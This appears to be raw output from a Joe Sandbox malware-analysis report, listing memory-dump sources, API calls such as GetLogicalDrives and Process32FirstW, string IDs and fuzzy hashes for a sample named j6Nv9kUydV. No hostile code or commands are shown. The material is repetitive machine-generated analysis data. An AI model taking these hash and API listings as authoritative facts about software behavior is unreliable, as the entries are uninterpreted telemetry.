                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\$A:\
                                                        • API String ID: 999431828-1047444362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 07080D5E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 07080D5E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 07080D5E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742689648.0000000007080000.00000040.00001000.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7080000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d3a447842e7afd20ef2423d5569d8df11746ac7f1cdbf6e94dcf8c43d91990d
                                                        • Instruction ID: 4f8280ca949d70816afd2dd50a643df7cda614329b87e1a59a5d58f5ce2f3ade
                                                        • Opcode Fuzzy Hash: 2d3a447842e7afd20ef2423d5569d8df11746ac7f1cdbf6e94dcf8c43d91990d
                                                        • Instruction Fuzzy Hash: 8691C8EB16D321BDB14280456F54AFF5A6EE6D7730F308726F82FC6642E2D84E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d933dd876db5efc8669c2f4740af22464ce63d36b99d586c0416047a8a6ae3e3
                                                        • Instruction ID: 124b2a67057ff0d099052acb6fc90695a290368d1f72c82d3d97c04cf7b297cd
                                                        • Opcode Fuzzy Hash: d933dd876db5efc8669c2f4740af22464ce63d36b99d586c0416047a8a6ae3e3
                                                        • Instruction Fuzzy Hash: 7F91D6EB16D321BDB14284456F14AFF6A6EE6D7730F308726F82FC6642E2D84E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8ff204a676fa2943c0780de8de493e4c8a317e8ef99d691a2488fa70aacf9261
                                                        • Instruction ID: 7a8279dd4b6a0ce50b7bf03b66bd0f307ba71bb2bcc7c4ec176b4fff21fd0ff5
                                                        • Opcode Fuzzy Hash: 8ff204a676fa2943c0780de8de493e4c8a317e8ef99d691a2488fa70aacf9261
                                                        • Instruction Fuzzy Hash: D791E8EB16D321BDB14280456F14AFF6A6EE6D7730F30872AF82FC6642E2D44E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7015680614c2de70785e4ee60d5a0969ee702ed28a4d576ae3f272b6dae06ad5
                                                        • Instruction ID: eeabb3c0d5a6c18ac52c54b658fdf0c05d4b083adefaea3494e63b24b3f3f15f
                                                        • Opcode Fuzzy Hash: 7015680614c2de70785e4ee60d5a0969ee702ed28a4d576ae3f272b6dae06ad5
                                                        • Instruction Fuzzy Hash: 1E91F7EB16D321BD714280456B54AFF6A6EE6D7730F30872AF82FC6642F2D44E891071
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d45188568071400c4b52819aa3933ff2b35636497e3044d5b715c855f5895f8
                                                        • Instruction ID: fd4a6e90e2a04b191ed6c546e43a224863094c8b8488556988562006abdaef5f
                                                        • Opcode Fuzzy Hash: 5d45188568071400c4b52819aa3933ff2b35636497e3044d5b715c855f5895f8
                                                        • Instruction Fuzzy Hash: F991D6EB16D321BDB14280456F14AFF6A6EE6D7730F308726F82FC6642E2D84E891071
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f76ccb4feeab319d9c55c50e493a8ba7c0c1f189f930cf95d9e318709288fef3
                                                        • Instruction ID: 7278132c82d7eb8345ca3aea21c86aa9a9d6bec8c03705a7cdb6ba67a636c45e
                                                        • Opcode Fuzzy Hash: f76ccb4feeab319d9c55c50e493a8ba7c0c1f189f930cf95d9e318709288fef3
                                                        • Instruction Fuzzy Hash: 1F91E7EB16D321BD714280856B14AFF6A6EE6D7730F308726F82FD6642F2D84E891071
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: adda2a927b80481603e37cadd702a42f0d90dafce2cead570b0dcda9e8fc5e5d
                                                        • Instruction ID: 335e36e9703a5af4f00c51f8603db7092b41f2ba7b34c1642655b5644f0a5c55
                                                        • Opcode Fuzzy Hash: adda2a927b80481603e37cadd702a42f0d90dafce2cead570b0dcda9e8fc5e5d
                                                        • Instruction Fuzzy Hash: D791D6EB16D321BDB14280456B54AFF6B6EE6D7730F30862AF82FC6642E2D84E491071
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 20b2712dd09070653f35abd2254603a01cbbdd2f46eff5ee8b73e9a34449ccc0
                                                        • Instruction ID: ec928b9b94b66204294259b9c5ac0e92a9fe9b7bd405a3c89c8547c7f4f189cb
                                                        • Opcode Fuzzy Hash: 20b2712dd09070653f35abd2254603a01cbbdd2f46eff5ee8b73e9a34449ccc0
                                                        • Instruction Fuzzy Hash: 8791D6EB16D321BDB14280856B54AFF5A6EE6D7730F308726F82FC6642E2D44E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d9e0fa08e643ca03b1cf4b74b4f09d0e6e95ebf6febcb907e2d8bd16468b6dc
                                                        • Instruction ID: ecee2da689435f646a5ae691709e1711eefbd000c4cc7c43fa433aaf9860d0bd
                                                        • Opcode Fuzzy Hash: 2d9e0fa08e643ca03b1cf4b74b4f09d0e6e95ebf6febcb907e2d8bd16468b6dc
                                                        • Instruction Fuzzy Hash: 5891E4EB16D321BDB14280856F54AFF6A6EE6D7730F308726F82FC6642E2D44E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37dad4b44ae93fe129c250d943bb71f392794956beb02b92f1aa5beccf28661a
                                                        • Instruction ID: 3c645f6e44dd80ce337321eac87e27ce2f75d5311b5574c487cd4045fdba7b6b
                                                        • Opcode Fuzzy Hash: 37dad4b44ae93fe129c250d943bb71f392794956beb02b92f1aa5beccf28661a
                                                        • Instruction Fuzzy Hash: B081F7EB16D321BDB14280455B14AFF5A2EE6D7730F30872AF82FC6642E2D44F891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3632a6d5807f8c984658e2a8286a5017dc5d0112f89a479311d5e68c37983ca
                                                        • Instruction ID: d5bcd64376251e4d8783a990378c69fc2c4f97a34f954797e6c9c7e253ba3e10
                                                        • Opcode Fuzzy Hash: a3632a6d5807f8c984658e2a8286a5017dc5d0112f89a479311d5e68c37983ca
                                                        • Instruction Fuzzy Hash: 828106EB16D321BDB14280816B14AFF5A2EE6D7730F30872AF82FC6642E2D44F891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd60753950ed9c18a390fb3de6c42b8307a8e78f652ac131685c9b9edee2b80b
                                                        • Instruction ID: 245511e127e4afecdf336411755514b4c23c45907a3d096f9c123244e0237738
                                                        • Opcode Fuzzy Hash: cd60753950ed9c18a390fb3de6c42b8307a8e78f652ac131685c9b9edee2b80b
                                                        • Instruction Fuzzy Hash: B88116EB16D321BD714280856B14AFF5A6EE6D7730F30872AF82FC6642E2D44F891071
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 788a1258046a91aa1287fc2e3193e28e2ef1ce79cdaa99d894456600c54134ee
                                                        • Instruction ID: a876092a193bd80e3c0978eadccdb38a7a61b71c619027a064ac3c2969865f29
                                                        • Opcode Fuzzy Hash: 788a1258046a91aa1287fc2e3193e28e2ef1ce79cdaa99d894456600c54134ee
                                                        • Instruction Fuzzy Hash: DB81F8EB16D321BDB14280816B14AFF5A1EE6D7730F30872AF82FC6642E2D44F891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07d4182116bb435bdb093aaaddecef88cb18b44443b591e0fcc20d844f2f6e4c
                                                        • Instruction ID: 6e0109b0f70c04dfad15a1cde9d9b6dead3b9a7209666ff4149c6c69b0d6c2a3
                                                        • Opcode Fuzzy Hash: 07d4182116bb435bdb093aaaddecef88cb18b44443b591e0fcc20d844f2f6e4c
                                                        • Instruction Fuzzy Hash: 2981D4EB16D321BDB14280856B54AFF5A6EE6D7730F30872AF82FC6642E2D44E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3bcbb3f5ffc2bf65dcd9d748c98a3b31fe9acf321c3b6a4f1abc3350fdacf207
                                                        • Instruction ID: 33da1d69ece2fa9db119443049d997507d48d64cdfcfe2e7f1f669256efb21be
                                                        • Opcode Fuzzy Hash: 3bcbb3f5ffc2bf65dcd9d748c98a3b31fe9acf321c3b6a4f1abc3350fdacf207
                                                        • Instruction Fuzzy Hash: 5F81D6EB16D321BDB14284816B54AFF5A2EE6D7730F30872AF82FD6642E2D44E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3602162dc5c01636cffee7e1b6553ba152718f8bbeb301a45f1eff323834439
                                                        • Instruction ID: 34abd0b0323ead56007d584b444570bd207da9f0a5007865a4c3fd2be352c414
                                                        • Opcode Fuzzy Hash: d3602162dc5c01636cffee7e1b6553ba152718f8bbeb301a45f1eff323834439
                                                        • Instruction Fuzzy Hash: 4F81D5EB16D321BDB14284856B54AFF5A2EE6D7730F30872AF82FC6642E2D44F891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ff54f6365e38e4b150128c986923fa70197881f4022f356b7319e804ced71b97
                                                        • Instruction ID: b17c70cc2640c3e0cfb535eb1af9b0b10ae322246b6456c679f9c5e574a02865
                                                        • Opcode Fuzzy Hash: ff54f6365e38e4b150128c986923fa70197881f4022f356b7319e804ced71b97
                                                        • Instruction Fuzzy Hash: E081F5EB16D321BD714290856B14AFF5A2EE6D7730F30872AF82FD6642E2D44F891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7aa9fdcd0f2b1a368d42a489398cfa0d935b859dca5174e0c32c5a7beffd34f
                                                        • Instruction ID: 2ab05d0a83ef49979915a1ff85a00dda77faff3ea6d7e8cf8aa479581685a91e
                                                        • Opcode Fuzzy Hash: a7aa9fdcd0f2b1a368d42a489398cfa0d935b859dca5174e0c32c5a7beffd34f
                                                        • Instruction Fuzzy Hash: 2081E6EB56D321BDB14280816B14AFF5B6EE6D7730F30872AF82FC6642E2D44E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2ed0a5ae00fab5925c567b8413eaa268ce24195609463b80e37ee0f2bf389200
                                                        • Instruction ID: e32987cdacc8a8b0c1191727addf6b949b84dae9038da21aa23aaa5010c915a4
                                                        • Opcode Fuzzy Hash: 2ed0a5ae00fab5925c567b8413eaa268ce24195609463b80e37ee0f2bf389200
                                                        • Instruction Fuzzy Hash: DC71C3EB16D321BD714290856B14EFF5A6EE6D7730F30872AF82FC6642E2D44E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 955237b397b78588091d47acf9e38a33838b2f18558543aa756ba14b18146240
                                                        • Instruction ID: 9332443c8ea2b99604d01afab6ebbe6a589422009a72c8bf8308e51639428715
                                                        • Opcode Fuzzy Hash: 955237b397b78588091d47acf9e38a33838b2f18558543aa756ba14b18146240
                                                        • Instruction Fuzzy Hash: 4D71C4EB16D321BDB24290856F14AFF576EE6D7730F30862AF82FC6546E2D44E891071
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: f8edc67fb42eaed911f52867137f3149a04b64160d85dde2be5349de0dcf7e3a
                                                        • Instruction ID: ba2b76cef783bf7c8e3372ce1cb4f3317b4697b80f93a4cc89b480b2ec044806
                                                        • Opcode Fuzzy Hash: f8edc67fb42eaed911f52867137f3149a04b64160d85dde2be5349de0dcf7e3a
                                                        • Instruction Fuzzy Hash: 9861B2EB16D321BD714280816F14AFF5A6EE6D7730F30862AF82FC6546E2D44E891031
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        • Opcode ID: 5b79a996ea2d0eb582942ada1bcb7b0bc14b20905d683affad9c9c2275577a1b
                                                        • Instruction ID: d76760101d786416f9cc993c94b6e25ee47ec43acbf4c701be8525d76f47a8a4
                                                        • Opcode Fuzzy Hash: 5b79a996ea2d0eb582942ada1bcb7b0bc14b20905d683affad9c9c2275577a1b
                                                        • Instruction Fuzzy Hash: D461A1EB26D321BD714280856F14AFF5A6EE6D7730F30862AF82FD6646E3D40E891075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8797356b8515aab371083438692feabda840045f82f4c7a94e0ded111158d978
                                                        • Instruction ID: 797257bd4e829b8ae53e80a91758288a48f6ac5f637eb3cfbd8ca58217b2b20b
                                                        • Opcode Fuzzy Hash: 8797356b8515aab371083438692feabda840045f82f4c7a94e0ded111158d978
                                                        • Instruction Fuzzy Hash: 4F61B3EB56D321BDB14280852F14EFF5A6EE6D7730F31862AF82FC6646E2D40E891075
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742662729.0000000007070000.00000040.00001000.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7070000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MWr1
                                                        • API String ID: 0-1830714503
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742971724.00000000070E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70e0000_j6Nv9kUydV.jbxd
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1742878820.00000000070D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_70d0000_j6Nv9kUydV.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        APIs
                                                        • Process32FirstW.KERNEL32(000000FF,000000FF,3EF02617,?), ref: 070D04C2
                                                        Memory Dump Source
